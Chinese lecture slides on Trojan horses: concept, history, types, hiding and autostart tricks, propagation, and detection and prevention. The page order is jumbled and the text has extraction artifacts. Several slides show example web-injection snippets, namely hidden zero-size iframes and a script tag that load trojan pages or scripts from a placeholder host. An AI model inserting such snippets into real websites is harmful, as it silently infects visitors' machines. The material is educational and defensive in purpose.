特洛伊木马

• 木马的最终意图是窃取信息、实施远程监控 • 木马与合法远程控制软件(如pcAnyWhere)的主要区别在于是 否具有隐蔽性、是否具有非授权性
木马的组成
• 木马系统软件一般由木马配置程序、控制程序和木马程序(服 务器程序)三部分组成
配置 控制 响应
配置程序
木马程序
控制程序 木马服务器 木马控制端(客户端)
特洛伊木马
内容概要
木马的概念
木马的危害
木马的隐藏和传播技术 典型木马分析与防范措施
2
特洛伊木马(Trojan Horse)
• 特洛伊木马(Trojan Horse)，简称木马，是一种恶意 程序，是一种基于远程控制的黑客工具，一旦侵入用 户的计算机，就悄悄地在宿主计算机上运行，在用户 毫无察觉的情况下，让攻击者获得远程访问和控制系 统的权限，进而在用户的计算机中修改文件、修改注 册表、控制鼠标、监视/控制键盘，或窃取用户信息. • 古希腊特洛伊之战中利用木马攻陷特洛伊城；现代网 络攻击者利用木马，采用伪装、欺骗(哄骗， Spoofing)等手段进入被攻击的计算机系统中，窃取 信息，实施远程监控
7
木马控制端与服务端连接的建立
• 木马通道与远程控制
– 木马连接建立后，控制端端口和服务端木马端口之间将会出现一 条通道 – 控制端上的控制端程序可藉这条通道与服务端上的木马程序取得 联系，并通过木马程序对服务端进行远程控制，实现的远程控制 就如同本地操作
控制端 控制端 程序 1096 6267 服务端 木马 程序 窃取密码 文件操作 修改注册表 系统操作
• 在任务栏里隐藏
– 通过VB编程中属性设置实现自身不出现在任务栏中
• 端口修改
– 使用非常用端口，或高位端口 – 自己修改端口
25
检测和清除木马的方法
– Windows XP的 Netstat工具提供 了一个新的-o选 项，能够显示出 正在使用端口的 程序或服务的进 程标识符(PID)。 有了PID，用任务 管理器就可以方 便地根据PID找到 对应的程序，以 便终止之
13
特洛伊木马的演变
• 第三代木马：网络传播型木马 – 随着Internet的普及，这一代木马兼备伪 装和传播两种特征并结合TCP/IP网络技 术四处泛滥。同时他还添加了“后门” 和击键记录等功能。 – 所谓后门就是一种可以为计算机系统秘 密开启访问入口的程序。 – 击键记录的功能功能主要是记录用户所 有的击键内容然后形成击键记录的日志 14 文件发送给恶意用户。
防范措施
1）使用正版防毒软件，并及时更新防毒病毒码； 2）及时打上系统和软件补丁； 3）不要访问色情、黑客等不良网站； 4）不要轻易相信“朋友”发来的链接和程序，对于下载的软件应该先查毒，然后 才能运行； 5）陌生人的邮件勿轻易打开； 6）定期更新密码，尤其是银行账号、游戏账号等的密码； 7) 使用防毒软件定期扫描系统。 对于企业用户而言还应做好以下几点： 1）加强网络管理，关闭不必要的网络端口和应用； 2）使用网络版的防毒软件，可以进行全网管理； 3）加强用户安全意识教育； 4）做好安全监控和病毒事件应急响应； 5）监控Web服务器是否挂马，有条件者可以寻求专业防毒机构和专业人士的支持 。
• 邮件炸弹木马 一旦机器被感染，木马就会随机生成各种各样主题的信件， 对特定的邮箱不停地发送邮件，一直到对方瘫痪、不能接受 邮件为止
20
20
代理木马
• 黑客在入侵的同时掩盖自己的足迹 • 给被控制的肉鸡种上代理木马 • 攻击者可以在匿名的情况下使用Telnet,ICQ,IRC等程序
查杀代理木马 系统比较慢，上网速度也慢下来，就有 可能是中了代理木马，先调用杀毒软件，升 级后在安全模式下全盘杀毒。
5
木马入侵基本过程
控制端 ①配置木马 ②传播木马 ③运行木马 Internet 木马 服务端
④信息反馈
信息
⑤建立连接
⑥远程控制
6
netstat查看木马打开的端口
Proto ① TCP ② TCP Local Address 202.102.47.56 : 6267 202.102.47.56 : 6267 服务端 IP地址 木马 端口 Foreign Address 202.96.96.102 : 1096 0.0.0.0 控制端 IP地址 控制端 端口 State ESTABLISHED LISTENING 连接状态： ①连接已建立 ②等待连接
32
网页挂马技术（二）
• js调用型网页挂马
– 利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术
<script language=javascript
src=http://www.xxx.com/gm.js></script>
http://www.xxx.com/gm.js就是一个js脚本文件，通过它调用和执行木 马的服务端。这些js文件一般都可以通过工具生成，攻击者只需输入相关 的选项就可以了
• 钓鱼欺骗（Phishing）
– 构造一个链接或者一个网页 – 利用社会工程学欺骗方法 – 欺骗用户输入某些个人，隐私信息，然后窃取个人隐私
• 漏洞攻击
– 利用操作系统和应用软件的漏洞进行的攻
30
常见传播方式（二）
• 网页挂马
– 网页挂马就是攻击者通过在正常的页面中（通常是网站的主页 ）插入一段代码。浏览者在打开该页面的时候，这段代码被执 行，然后下载并运行某木马的服务器端程序，进而控制浏览者 的主机
注：当用户打开http://www.xxx.com/test.htm是，显示给用户的是 http://www.xxx.com/test.jpg，而http://www.xxx.com/test.htm网页代 码也随之运行。
34
TROJ_WIDGET.046
1. 用户从互联网 下载免费软件
35
特洛伊木马防范措施
进程标识符PID与映射名称
隐藏技术（二）
• 隐藏通讯
– 占领 80HTTP端口 – 收到正常的HTTP请求仍然把它交与Web服务器处理，只有收到 一些特殊约定的数据包后，才调用木马程序
• 隐藏加载方式
– – – – – – – – – 在Win.ini中启动 在System.ini中启动 利用注册表加载运行 在Autoexec.bat和Config.sys中加载运行 在Winstart.bat中启动 启动组 *.INI 修改文件关联 捆绑文件
18
18
键盘记录木马
• 记录受害者的键盘敲击并且在LOG文件里查找密码 • 随着Windows启动 • 同时具有邮件发送功能
19
DoS （ Denial of Service的简称，即拒绝服务） 攻击木马
• 入侵一台机器 • 将该计算机做为DoS攻击的平台，也称为肉鸡 • 攻击者可以利用它来攻击一台又一台计算机，给网络造成很 大的伤害和带来损失
37
31
网页挂马技术（一）
• 框架嵌入式网络挂马
– 将网页木马利用frame语句加载到任意网页中
<iframe src=http://www.xxx.com/muma.html
wiຫໍສະໝຸດ Baiduth=0
height=0></iframe>
解释：在打开插入该句代码的网页后，就也就打开了 http://www.xxx.com/muma.html页面，但是由于它的长和宽都为“0”，所以 很难察觉，非常具有隐蔽性。
特洛伊木马类型
破坏型木马
• 破坏并且删除文件 • 删除DLL、INI、EXE文件
16
密码发送型
• 查找相关密码 • 发送指定邮件（控制者） 获取密码的方法：
– 搜索密码文件 – 记录键盘操作 – 暴力破译加密文件
17
17
远程访问型
• 只需有人运行了服务端程序，如果客户知道了服务端的IP 地址，就可以实现远程控制。 • 利用程序可以实现观察“受害者”正在干什么 • 可用于计算机远程监控和远程排错等操作
27
隐藏技术（三）
• 最新隐身技术
– 修改虚拟设备驱动程序(VXD) – 修改动态链接库 (DLL) – 将修改后的DLL替换系统已知的DLL，并对所有的函数调 用进行过滤
– 优势： 没有增加新的文件 不需要打开新的端口 没有新的进程产生
28
特洛伊木马的传播
常见传播方式（一）
• 捆绑欺骗
– 把木马服务端和某个游戏/软件捆绑成一个文件 – 通过即时通讯工具、邮件、下载工具等渠道发送出去
21
FTP木马
• 功能就是打开21端口，等待用户连接 • 对端口进行加密，只有攻击者本人才知道正确的密码， 从而进入对方计算机
22
程序杀手木马
• 关闭对方机器上运行的防木马程序 • 让其他的木马更好地发挥作用。
23
特洛伊木马隐藏技术
隐藏技术（一）
• 在任务管理器里隐藏
– 任务管理器中查看不到木马进程 – 木马将自己设成“系统服务”
33
网页挂马技术（三）
• 图片伪装挂马
– 攻击者直接将网页木马加载到图片中
http://www.xxx.com/test.htm中的木马代码植入到test.jpg图片文件中
图片木马生成后，再利用代码调用执行，实例代码如：
<html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="http://www.xxx.com/test.jpg"></center> </html>
木马&病毒
• 木马与病毒
– 一般情况下，病毒是依据其能够进行自我复制即传染性的特点 而定义的 – 特洛伊木马主要是根据它的有效载体，或者是其功能来定义的 ，更多情况下是根据其意图来定义的 – 木马一般不进行自我复制，但具有寄生性，如捆绑在合法程序 中得到安装、启动木马的权限，DLL木马甚至采用动态嵌入技术 寄生在合法程序的进程中 – 木马一般不具有普通病毒所具有的自我繁殖、主动感染传播等 特性，但我们习惯上将其纳入广义病毒，也就是说，木马也是 广义病毒的一个子类
特洛伊木马简史
•第一代木马 ：伪装型 通过伪装成一个合法性程 序诱骗用户上当
11
伪装型木马
12
特洛伊木马的演变
• 第二代木马 ： AIDS 型 1989 年出现 ,EMAIL未普及.利用现实生活中的邮件进 行散播：给其他人寄去一封封含有木马程 序软盘的邮件。之所以叫这个名称是因为 软盘中包含有 AIDS 和 HIV 疾病的药品， 价格，预防措施等相关信息。软盘中的木 马程序在运行后，虽然不会破坏数据，但 是他将硬盘加密锁死，然后提示受感染用 户花钱消灾